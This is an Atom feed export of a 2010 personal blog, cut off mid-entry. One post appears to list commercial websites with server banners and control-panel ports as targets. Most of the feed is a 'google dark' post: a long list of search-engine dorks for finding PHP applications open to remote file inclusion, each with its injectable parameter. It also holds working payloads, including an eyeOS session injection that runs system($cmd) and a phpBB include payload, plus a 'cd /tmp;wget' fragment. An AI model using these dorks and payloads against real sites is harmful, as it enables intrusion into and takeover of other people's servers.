<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-7189604446558257106</id><updated>2011-12-10T20:02:02.274-08:00</updated><category term='HTTP Status Codes'/><category term='PHP source code auditing'/><category term='discovery scripts'/><title type='text'>drag0n</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://who-knows-drag0n.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://who-knows-drag0n.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>dragon</name><uri>http://www.blogger.com/profile/06564471882369082840</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>15</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-7189604446558257106.post-3831003261165203498</id><published>2010-08-29T08:50:00.000-07:00</published><updated>2010-08-29T08:52:13.828-07:00</updated><title type='text'>yi wu commodity city</title><content type='html'>&lt;a href="http://www.ywtrade.info"&gt;welcome to yiwu commodity city &lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7189604446558257106-3831003261165203498?l=who-knows-drag0n.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://who-knows-drag0n.blogspot.com/feeds/3831003261165203498/comments/default' title='帖子评论'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7189604446558257106&amp;postID=3831003261165203498&amp;isPopup=true' title='0 条评论'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/3831003261165203498'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/3831003261165203498'/><link rel='alternate' type='text/html' href='http://who-knows-drag0n.blogspot.com/2010/08/yi-wu-commodity-city.html' title='yi wu commodity city'/><author><name>dragon</name><uri>http://www.blogger.com/profile/06564471882369082840</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7189604446558257106.post-3624215257895806182</id><published>2010-08-16T19:14:00.000-07:00</published><updated>2010-08-16T19:16:55.109-07:00</updated><title type='text'>fuck</title><content type='html'>kker&lt;br /&gt;http://www.aldeid.com/index.php/Bruteforce&lt;br /&gt; &lt;br /&gt; &lt;br /&gt; 23:53:56&lt;br /&gt;www.eValueSoftware.com &lt;br /&gt;www.softwarwlocker.com&lt;br /&gt;www.DirectDeals.com&lt;br /&gt;www.morristek.com&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;22:32:47&lt;br /&gt;http://bestbodycoach.com&lt;br /&gt;http://showbaseonline.com&lt;br /&gt;www.beachworkout.info&lt;br /&gt;www.Insanityp90xoffer.us&lt;br /&gt;www.dssdkqs.com               *&lt;br /&gt;http://www.p90x-shoper.com&lt;br /&gt;"Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_perl/2.0.4 Perl/v5.8.8". This information was found in the request with id 163.&lt;br /&gt;www.jv50.com         &lt;br /&gt;www.excisegettoday.info&lt;br /&gt;www.planP90X.com              *&lt;br /&gt;www.godiservices.com          *&lt;br /&gt;http://www.godiservices.com:2095/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7189604446558257106-3624215257895806182?l=who-knows-drag0n.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://who-knows-drag0n.blogspot.com/feeds/3624215257895806182/comments/default' title='帖子评论'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7189604446558257106&amp;postID=3624215257895806182&amp;isPopup=true' title='0 条评论'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/3624215257895806182'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/3624215257895806182'/><link rel='alternate' type='text/html' href='http://who-knows-drag0n.blogspot.com/2010/08/fuck.html' title='fuck'/><author><name>dragon</name><uri>http://www.blogger.com/profile/06564471882369082840</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7189604446558257106.post-6986566448195653558</id><published>2010-08-08T10:00:00.001-07:00</published><updated>2010-08-08T10:03:23.657-07:00</updated><title type='text'>SCAN</title><content type='html'>http://indonesiandefacer.org/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7189604446558257106-6986566448195653558?l=who-knows-drag0n.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://docs.google.com/View?id=dcz2n8rj_0f5zjj8cx' title='SCAN'/><link rel='replies' type='application/atom+xml' href='http://who-knows-drag0n.blogspot.com/feeds/6986566448195653558/comments/default' title='帖子评论'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7189604446558257106&amp;postID=6986566448195653558&amp;isPopup=true' title='0 条评论'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/6986566448195653558'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7189604446558257106/posts/default/6986566448195653558'/><link rel='alternate' type='text/html' href='http://who-knows-drag0n.blogspot.com/2010/08/scan.html' title='SCAN'/><author><name>dragon</name><uri>http://www.blogger.com/profile/06564471882369082840</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7189604446558257106.post-3823418928491271539</id><published>2010-08-08T08:56:00.000-07:00</published><updated>2010-08-08T09:58:11.467-07:00</updated><title type='text'>google dark</title><content type='html'>RFI--------------------RFI----------------------http://searchirc.com/irc-scan%20ON%20!scan%20bug%20dork-1&lt;br /&gt;&lt;br /&gt;inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;&lt;br /&gt;inurl:/include/new-visitor.inc.php?lvc_include_dir=&lt;br /&gt;&lt;br /&gt;inurl:/_functions.php?prefix=&lt;br /&gt;&lt;br /&gt;inurl:/cpcommerce/_functions.php?prefix=&lt;br /&gt;&lt;br /&gt;inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;&lt;br /&gt;inurl:/modules/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;&lt;br /&gt;inurl:/ashnews.php?pathtoashnews=&lt;br /&gt;&lt;br /&gt;inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=&lt;br /&gt;&lt;br /&gt;inurl:/pm/lib.inc.php?pm_path=&lt;br /&gt;&lt;br /&gt;inurl:/b2-tools/gm-2-b2.php?b2inc=&lt;br /&gt;&lt;br /&gt;inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;&lt;br /&gt;inurl:/modules/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;&lt;br /&gt;inurl:/includes/include_once.php?include_file=&lt;br /&gt;&lt;br /&gt;inurl:/e107/e107_handlers/secure_img_render.php?p=&lt;br /&gt;&lt;br /&gt;inurl:/shoutbox/expanded.php?conf=&lt;br /&gt;&lt;br /&gt;inurl:/main.php?x=&lt;br /&gt;&lt;br /&gt;inurl:/myPHPCalendar/admin.php?cal_dir=&lt;br /&gt;&lt;br /&gt;inurl:/index.php/main.php?x=&lt;br /&gt;&lt;br /&gt;inurl:/index.php?include=&lt;br /&gt;&lt;br /&gt;inurl:/index.php?x=&lt;br /&gt;&lt;br /&gt;inurl:/index.php?open=&lt;br /&gt;&lt;br /&gt;inurl:/index.php?visualizar=&lt;br /&gt;&lt;br /&gt;inurl:/template.php?pagina=&lt;br /&gt;&lt;br /&gt;inurl:/index.php?pagina=&lt;br /&gt;&lt;br /&gt;inurl:/index.php?inc=&lt;br /&gt;&lt;br /&gt;inurl:/includes/include_onde.php?include_file=&lt;br /&gt;&lt;br /&gt;inurl:/index.php?page=&lt;br /&gt;&lt;br /&gt;inurl:/index.php?pg=&lt;br /&gt;&lt;br /&gt;inurl:/index.php?show=&lt;br /&gt;&lt;br /&gt;inurl:/index.php?cat=&lt;br /&gt;&lt;br /&gt;inurl:/index.php?file=&lt;br /&gt;&lt;br /&gt;inurl:/db.php?path_local=&lt;br /&gt;&lt;br /&gt;inurl:/index.php?site=&lt;br /&gt;&lt;br /&gt;inurl:/htmltonuke.php?filnavn=&lt;br /&gt;&lt;br /&gt;inurl:/livehelp/inc/pipe.php?HCL_path=&lt;br /&gt;&lt;br /&gt;inurl:/hcl/inc/pipe.php?HCL_path=&lt;br /&gt;&lt;br /&gt;inurl:/inc/pipe.php?HCL_path=&lt;br /&gt;&lt;br /&gt;inurl:/support/faq/inc/pipe.php?HCL_path=&lt;br /&gt;&lt;br /&gt;inurl:/help/faq/inc/pipe.php?HCL_path=&lt;br /&gt;&lt;br /&gt;inurl:/helpcenter/inc/pipe.php?HCL_path=&lt;br /&gt;&lt;br /&gt;inurl:/live-support/inc/pipe.php?HCL_path=&lt;br /&gt;&lt;br /&gt;inurl:/gnu3/index.php?doc=&lt;br /&gt;&lt;br /&gt;inurl:/gnu/index.php?doc=&lt;br /&gt;&lt;br /&gt;inurl:/phpgwapi/setup/tables_update.inc.php?appdir=&lt;br /&gt;&lt;br /&gt;inurl:/forum/install.php?phpbb_root_dir=&lt;br /&gt;&lt;br /&gt;inurl:/includes/calendar.php?phpc_root_path=&lt;br /&gt;&lt;br /&gt;inurl:/includes/setup.php?phpc_root_path=&lt;br /&gt;&lt;br /&gt;inurl:/inc/authform.inc.php?path_pre=&lt;br /&gt;&lt;br /&gt;inurl:/include/authform.inc.php?path_pre=&lt;br /&gt;&lt;br /&gt;inurl:index.php?nic=&lt;br /&gt;&lt;br /&gt;inurl:index.php?sec=&lt;br /&gt;&lt;br /&gt;inurl:index.php?content=&lt;br /&gt;&lt;br /&gt;inurl:index.php?link=&lt;br /&gt;&lt;br /&gt;inurl:index.php?filename=&lt;br /&gt;&lt;br /&gt;inurl:index.php?dir=&lt;br /&gt;&lt;br /&gt;inurl:index.php?document=&lt;br /&gt;&lt;br /&gt;inurl:index.php?view=&lt;br /&gt;&lt;br /&gt;inurl:*.php?sel=&lt;br /&gt;&lt;br /&gt;inurl:*.php?session=&amp;content=&lt;br /&gt;&lt;br /&gt;inurl:*.php?locate=&lt;br /&gt;&lt;br /&gt;inurl:*.php?place=&lt;br /&gt;&lt;br /&gt;inurl:*.php?layout=&lt;br /&gt;&lt;br /&gt;inurl:*.php?go=&lt;br /&gt;&lt;br /&gt;inurl:*.php?catch=&lt;br /&gt;&lt;br /&gt;inurl:*.php?mode=&lt;br /&gt;&lt;br /&gt;inurl:*.php?name=&lt;br /&gt;&lt;br /&gt;inurl:*.php?loc=&lt;br /&gt;&lt;br /&gt;inurl:*.php?f=&lt;br /&gt;&lt;br /&gt;inurl:*.php?inf=&lt;br /&gt;&lt;br /&gt;inurl:*.php?pg=&lt;br /&gt;&lt;br /&gt;inurl:*.php?load=&lt;br /&gt;&lt;br /&gt;inurl:*.php?naam=&lt;br /&gt;&lt;br /&gt;allinurl:/index.php?page= site:*.dk&lt;br /&gt;&lt;br /&gt;allinurl:/index.php?file= site:*.dk&lt;br /&gt;&lt;br /&gt;INURL OR ALLINURL WITH:&lt;br /&gt;&lt;br /&gt;/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=&lt;br /&gt;&lt;br /&gt;/includes/header.php?systempath=&lt;br /&gt;&lt;br /&gt;/Gallery/displayCategory.php?basepath=&lt;br /&gt;&lt;br /&gt;/index.inc.php?PATH_Includes=&lt;br /&gt;&lt;br /&gt;/ashnews.php?pathtoashnews=&lt;br /&gt;&lt;br /&gt;/ashheadlines.php?pathtoashnews=&lt;br /&gt;&lt;br /&gt;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;&lt;br /&gt;/demo/includes/init.php?user_inc=&lt;br /&gt;&lt;br /&gt;/jaf/index.php?show=&lt;br /&gt;&lt;br /&gt;/inc/shows.inc.php?cutepath=&lt;br /&gt;&lt;br /&gt;/poll/admin/common.inc.php?base_path=&lt;br /&gt;&lt;br /&gt;/pollvote/pollvote.php?pollname=&lt;br /&gt;&lt;br /&gt;/sources/post.php?fil_config=&lt;br /&gt;&lt;br /&gt;/modules/My_eGallery/public/displayCategory.php?basepath=&lt;br /&gt;&lt;br /&gt;/bb_lib/checkdb.inc.php?libpach=&lt;br /&gt;&lt;br /&gt;/include/livre_include.php?no_connect=lol&amp;chem_absolu=&lt;br /&gt;&lt;br /&gt;/index.php?from_market=Y&amp;pageurl=&lt;br /&gt;&lt;br /&gt;/modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;&lt;br /&gt;/pivot/modules/module_db.php?pivot_path=&lt;br /&gt;&lt;br /&gt;/modules/4nAlbum/public/displayCategory.php?basepath=&lt;br /&gt;&lt;br /&gt;/derniers_commentaires.php?rep=&lt;br /&gt;&lt;br /&gt;/modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;&lt;br /&gt;/modules/coppermine/include/init.inc.php?CPG_M_DIR=&lt;br /&gt;&lt;br /&gt;/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=&lt;br /&gt;&lt;br /&gt;/coppermine/themes/maze/theme.php?THEME_DIR=&lt;br /&gt;&lt;br /&gt;/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=&lt;br /&gt;&lt;br /&gt;/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=&lt;br /&gt;&lt;br /&gt;/myPHPCalendar/admin.php?cal_dir=&lt;br /&gt;&lt;br /&gt;/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;&lt;br /&gt;/modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;&lt;br /&gt;/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;&lt;br /&gt;/main.php?page=&lt;br /&gt;&lt;br /&gt;/default.php?page=&lt;br /&gt;&lt;br /&gt;/index.php?action=&lt;br /&gt;&lt;br /&gt;/index1.php?p=&lt;br /&gt;&lt;br /&gt;/index2.php?x=&lt;br /&gt;&lt;br /&gt;/index2.php?content=&lt;br /&gt;&lt;br /&gt;/index.php?conteudo=&lt;br /&gt;&lt;br /&gt;/index.php?cat=&lt;br /&gt;&lt;br /&gt;/include/new-visitor.inc.php?lvc_include_dir=&lt;br /&gt;&lt;br /&gt;/modules/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;&lt;br /&gt;/shoutbox/expanded.php?conf=&lt;br /&gt;&lt;br /&gt;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;&lt;br /&gt;/pivot/modules/module_db.php?pivot_path=&lt;br /&gt;&lt;br /&gt;/library/editor/editor.php?root=&lt;br /&gt;&lt;br /&gt;/library/lib.php?root=&lt;br /&gt;&lt;br /&gt;/e107/e107_handlers/secure_img_render.php?p=&lt;br /&gt;&lt;br /&gt;/zentrack/index.php?configFile=&lt;br /&gt;&lt;br /&gt;/main.php?x=&lt;br /&gt;&lt;br /&gt;/becommunity/community/index.php?pageurl=&lt;br /&gt;&lt;br /&gt;/GradeMap/index.php?page=&lt;br /&gt;&lt;br /&gt;/index4.php?body=&lt;br /&gt;&lt;br /&gt;/side/index.php?side=&lt;br /&gt;&lt;br /&gt;/main.php?page=&lt;br /&gt;&lt;br /&gt;/es/index.php?action=&lt;br /&gt;&lt;br /&gt;/index.php?sec=&lt;br /&gt;&lt;br /&gt;/index.php?main=&lt;br /&gt;&lt;br /&gt;/index.php?sec=&lt;br /&gt;&lt;br /&gt;/index.php?menu=&lt;br /&gt;&lt;br /&gt;/html/page.php?page=&lt;br /&gt;&lt;br /&gt;/page.php?view=&lt;br /&gt;&lt;br /&gt;/index.php?menu=&lt;br /&gt;&lt;br /&gt;/main.php?view=&lt;br /&gt;&lt;br /&gt;/index.php?page=&lt;br /&gt;&lt;br /&gt;/content.php?page=&lt;br /&gt;&lt;br /&gt;/main.php?page=&lt;br /&gt;&lt;br /&gt;/index.php?x=&lt;br /&gt;&lt;br /&gt;/main_site.php?page=&lt;br /&gt;&lt;br /&gt;/index.php?L2=&lt;br /&gt;&lt;br /&gt;/content.php?page=&lt;br /&gt;&lt;br /&gt;/main.php?page=&lt;br /&gt;&lt;br /&gt;/index.php?x=&lt;br /&gt;&lt;br /&gt;/main_site.php?page=&lt;br /&gt;&lt;br /&gt;/index.php?L2=&lt;br /&gt;&lt;br /&gt;/index.php?show=&lt;br /&gt;&lt;br /&gt;/tutorials/print.php?page=&lt;br /&gt;&lt;br /&gt;/index.php?page=&lt;br /&gt;&lt;br /&gt;/index.php?level=&lt;br /&gt;&lt;br /&gt;/index.php?file=&lt;br /&gt;&lt;br /&gt;/index.php?inter_url=&lt;br /&gt;&lt;br /&gt;/index.php?page=&lt;br /&gt;&lt;br /&gt;/index2.php?menu=&lt;br /&gt;&lt;br /&gt;/index.php?level=&lt;br /&gt;&lt;br /&gt;/index1.php?main=&lt;br /&gt;&lt;br /&gt;/index1.php?nav=&lt;br /&gt;&lt;br /&gt;/index1.php?link=&lt;br /&gt;&lt;br /&gt;/index2.php?page=&lt;br /&gt;&lt;br /&gt;/index.php?myContent=&lt;br /&gt;&lt;br /&gt;/index.php?TWC=&lt;br /&gt;&lt;br /&gt;/index.php?sec=&lt;br /&gt;&lt;br /&gt;/index1.php?main=&lt;br /&gt;&lt;br /&gt;/index2.php?page=&lt;br /&gt;&lt;br /&gt;/index.php?babInstallPath=&lt;br /&gt;&lt;br /&gt;/main.php?body=&lt;br /&gt;&lt;br /&gt;/index.php?z=&lt;br /&gt;&lt;br /&gt;/main.php?view=&lt;br /&gt;&lt;br /&gt;/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=&lt;br /&gt;&lt;br /&gt;/index.php?file=&lt;br /&gt;&lt;br /&gt;/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. allinurl:my_egallery site:.org&lt;br /&gt;/modules/My_eGallery/public/displayCategory.php?basepath=&lt;br /&gt;&lt;br /&gt;2. allinurl:xgallery site:.org&lt;br /&gt;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;&lt;br /&gt;3. allinurl:coppermine site:.org&lt;br /&gt;/modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;&lt;br /&gt;4. allinurl:4nAlbum site:.org&lt;br /&gt;/modules/4nAlbum/public/displayCategory.php?basepath=&lt;br /&gt;&lt;br /&gt;5. allinurlP:NphpBB2 site:.org&lt;br /&gt;/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=&lt;br /&gt;&lt;br /&gt;6. allinurl:ihm.php?p=&lt;br /&gt;&lt;br /&gt;7. Keyword : "powered by AllMyLinks"&lt;br /&gt;/include/footer.inc.php?_AMLconfig[cfg_serverpath]=&lt;br /&gt;&lt;br /&gt;8. allinurl:/modules.php?name=allmyguests&lt;br /&gt;/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=&lt;br /&gt;&lt;br /&gt;9. allinurl:/Popper/index.php?&lt;br /&gt;/Popper/index.php?childwindow.inc.php?form=&lt;br /&gt;&lt;br /&gt;10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php&lt;br /&gt;yahoo = by Kietu? v 3.2&lt;br /&gt;/kietu/index.php?kietu[url_hit]=&lt;br /&gt;&lt;br /&gt;11. keyword : "Powered by phpBB 2.0.6"&lt;br /&gt;/html&amp;highlight=%2527.include($_GET[a]),exit.%2527&amp;a=&lt;br /&gt;&lt;br /&gt;12. keyword : "powered by CubeCart 3.0.6"&lt;br /&gt;/includes/orderSuccess.inc.php?glob=1&amp;cart_order_id=1&amp;glob[rootDir]=&lt;br /&gt;&lt;br /&gt;13. keyword : "powered by paBugs 2.0 Beta 3"&lt;br /&gt;/class.mysql.php?path_to_bt_dir=&lt;br /&gt;&lt;br /&gt;14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php&lt;br /&gt;/ashnews.php?pathtoashnews=&lt;br /&gt;&lt;br /&gt;15. keyword : /phorum/login.php&lt;br /&gt;/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=&lt;br /&gt;&lt;br /&gt;16. allinurl:ihm.php?p=*&lt;br /&gt;&lt;br /&gt;14. keyword : "powered eyeOs"&lt;br /&gt;/eyeos/desktop.php?baccio=eyeOptions.eyeapp&amp;a=eyeOptions.eyeapp&amp;_SESSION%5busr%5d=root&amp;_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&amp;cmd=id&lt;br /&gt;diganti dengan :&lt;br /&gt;/eyeos/desktop.php?baccio=eyeOptions.eyeapp&amp;a=eyeOptions.eyeapp&amp;_SESSION%5busr%5d=root&amp;_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&amp;a=&lt;br /&gt;&lt;br /&gt;15. allinurl:.php?bodyfile=&lt;br /&gt;&lt;br /&gt;16. allinurl:/includes/orderSuccess.inc.php?glob=&lt;br /&gt;/includes/orderSuccess.inc.php?glob=1&amp;cart_order_id=1&amp;glob[rootDir]=&lt;br /&gt;&lt;br /&gt;17. allinurl:forums.html&lt;br /&gt;/modules.php?name=&lt;br /&gt;&lt;br /&gt;18. allinurl:/default.php?page=home&lt;br /&gt;&lt;br /&gt;19. allinurl:/folder.php?id=&lt;br /&gt;&lt;br /&gt;20. allinurl:main.php?pagina=&lt;br /&gt;/paginedinamiche/main.php?pagina=&lt;br /&gt;&lt;br /&gt;21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")&lt;br /&gt;/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=&lt;br /&gt;&lt;br /&gt;22. allinurl:application.php?base_path=&lt;br /&gt;/application.php?base_path=&lt;br /&gt;&lt;br /&gt;23. allinurlp:hplivehelper&lt;br /&gt;/phplivehelper/initiate.php?abs_path=&lt;br /&gt;&lt;br /&gt;24. allinurlp:hpnuke&lt;br /&gt;/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=&lt;br /&gt;&lt;br /&gt;25. key word : "powered by Fantastic News v2.1.2"&lt;br /&gt;/archive.php?CONFIG[script_path]=&lt;br /&gt;&lt;br /&gt;26. keyword: "powered by smartblog" AND inurl:?page=login&lt;br /&gt;/index.php?page=&lt;br /&gt;&lt;br /&gt;27. allinurl:/forum/&lt;br /&gt;/forum/admin/index.php?inc_conf=&lt;br /&gt;&lt;br /&gt;28. keyword:"Powered By FusionPHP"&lt;br /&gt;/templates/headline_temp.php?nst_inc=&lt;br /&gt;&lt;br /&gt;29. allinurl:shoutbox/expanded.php filetypep:hp&lt;br /&gt;/shoutbox/expanded.php?conf=&lt;br /&gt;&lt;br /&gt;30. allinurl: /osticket/&lt;br /&gt;/osticket/include/main.php?config[search_disp]=true&amp;include_dir=&lt;br /&gt;&lt;br /&gt;31. keyword : "Powered by iUser"&lt;br /&gt;/common.php?include_path=&lt;br /&gt;&lt;br /&gt;32. allinurl: "static.php?load="&lt;br /&gt;/static.php?load=&lt;br /&gt;&lt;br /&gt;33. keyworld : /phpcoin/login.php&lt;br /&gt;/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=&lt;br /&gt;&lt;br /&gt;34. keyworld: allinurl:/phpGedview/login.php site:&lt;br /&gt;/help_text_vars.php?dir&amp;PGV_BASE_DIRECTORY=&lt;br /&gt;&lt;br /&gt;35. allinurl:/folder.php?id=&lt;br /&gt;/classes.php?LOCAL_PATH=&lt;br /&gt;&lt;br /&gt;inurl:"/lire.php?rub="&lt;br /&gt;&lt;br /&gt;inurl:"/os/pointer.php?url="&lt;br /&gt;&lt;br /&gt;inurl:"folder.php?id="&lt;br /&gt;&lt;br /&gt;inurl:"show.php?page="&lt;br /&gt;&lt;br /&gt;inurl:"index2.php?DoAction="&lt;br /&gt;&lt;br /&gt;inurl:"index.php?canal="&lt;br /&gt;&lt;br /&gt;inurl:"index.php?screen="&lt;br /&gt;&lt;br /&gt;inurl:"index.php?langc="&lt;br /&gt;&lt;br /&gt;inurl:"index.php?Language="&lt;br /&gt;&lt;br /&gt;inurl:"view.php?page="&lt;br /&gt;&lt;br /&gt;dork: "powered by doodle cart"&lt;br /&gt;rfi of this dork: enc/content.php?Home_Path=&lt;br /&gt;&lt;br /&gt;dork: "Login to Calendar"&lt;br /&gt;rfi of this dork: /embed/day.php?path=&lt;br /&gt;&lt;br /&gt;dork: "powered by EQdkp"&lt;br /&gt;rfi of this dork: /includes/dbal.php?eqdkp_root_path=&lt;br /&gt;&lt;br /&gt;inurl:"template.php?goto="&lt;br /&gt;&lt;br /&gt;inurl:"video.php?content="&lt;br /&gt;&lt;br /&gt;inurl:"pages.php?page="&lt;br /&gt;&lt;br /&gt;inurl:"index1.php?choix="&lt;br /&gt;&lt;br /&gt;inurl:"index1.php?menu="&lt;br /&gt;&lt;br /&gt;inurl:"index2.php?ascii_seite="&lt;br /&gt;&lt;br /&gt;dork: inurl:surveys&lt;br /&gt;rfi to this dork: /surveys/survey.inc.php?path=&lt;br /&gt;&lt;br /&gt;inurl:"index.php?body="&lt;br /&gt;&lt;br /&gt;dork: allinurl:adobt sitel&lt;br /&gt;rfi to this dork: /classes/adodbt/sql.php?classes_dir=&lt;br /&gt;&lt;br /&gt;dork: "Powered By ScozNews"&lt;br /&gt;rfi to this dork: /sources/functions.php?CONFIG[main_path]=&lt;br /&gt;rfi to this dork: /sources/template.php?CONFIG[main_path]=&lt;br /&gt;&lt;br /&gt;inurl:"kb_constants.php?module_root_path="&lt;br /&gt;&lt;br /&gt;dork: allinurl:"mcf.php"&lt;br /&gt;rfi to this dork: /mcf.php?content=&lt;br /&gt;&lt;br /&gt;dork: inurl:"main.php?sayfa="&lt;br /&gt;rfi to this dork: /main.php?sayfa=&lt;br /&gt;&lt;br /&gt;dork: "MobilePublisherPHP"&lt;br /&gt;rfi to this dork: /header.php?abspath=&lt;br /&gt;&lt;br /&gt;dork: "powered by phpCOIN 1.2.3"&lt;br /&gt;rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=&lt;br /&gt;&lt;br /&gt;allinurl:login.php?dir=&lt;br /&gt;&lt;br /&gt;inurl:"index.php?go="&lt;br /&gt;&lt;br /&gt;inurl:"index1.php?="&lt;br /&gt;&lt;br /&gt;inurl:"lib/gore.php?libpath="&lt;br /&gt;&lt;br /&gt;inurl:"index2.php?p="&lt;br /&gt;&lt;br /&gt;becommunity/community/index.php?pageurl=&lt;br /&gt;index.php?sqld=&lt;br /&gt;modules/module_db.php?pivot_path=&lt;br /&gt;catalog/includes/include_once.php?include_file=&lt;br /&gt;cgi-bin/calendar.pl?fromTemplate=&lt;br /&gt;live/inc/pipe.php?HCL_path=&lt;br /&gt;zb41/include/write.php?dir=&lt;br /&gt;cgi-bin/awstats.pl?logfile=&lt;br /&gt;presse/stampa.php3?azione=&lt;br /&gt;inc/step_one_tables.php?server_inc=&lt;br /&gt;index.php?mainpage=&lt;br /&gt;phpprojekt/lib/authform.inc.php?path_pre=&lt;br /&gt;captionator.php?GALLERY_BASEDIR=&lt;br /&gt;_head.php?_zb_path=.example.com&lt;br /&gt;achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=&lt;br /&gt;gallery/captionator.php?GALLERY_BASEDIR=.example.com&lt;br /&gt;globals.php3?LangCookie=.example.com&lt;br /&gt;include/msql.php?inc_dir=&lt;br /&gt;include/mssql7.php?inc_dir=&lt;br /&gt;include/mysql.php?inc_dir=&lt;br /&gt;include/oci8.php?inc_dir=&lt;br /&gt;include/postgres.php?inc_dir=&lt;br /&gt;include/postgres65.php?inc_dir=&lt;br /&gt;install.php?phpbb_root_dir=&lt;br /&gt;mantis/login_page.php?g_meta_inc_dir=&lt;br /&gt;page.php?template=&lt;br /&gt;phorum/admin/actions/del.php?include_path=&lt;br /&gt;pollensondage.inc.php?app_path=&lt;br /&gt;user/agora_user.php?inc_dir=&lt;br /&gt;user/ldap_example.php?inc_dir=&lt;br /&gt;userlist.php?ME=.example.com&lt;br /&gt;_functions.php?prefix=&lt;br /&gt;cpcommerce/_functions.php?prefix=&lt;br /&gt;ashnews.php?pathtoashnews=cd /tmp;wget&lt;br /&gt;eblog/blog.inc.php?xoopsConfig[xoops_url]=&lt;br /&gt;b2-tools/gm-2-b2.php?b2inc=&lt;br 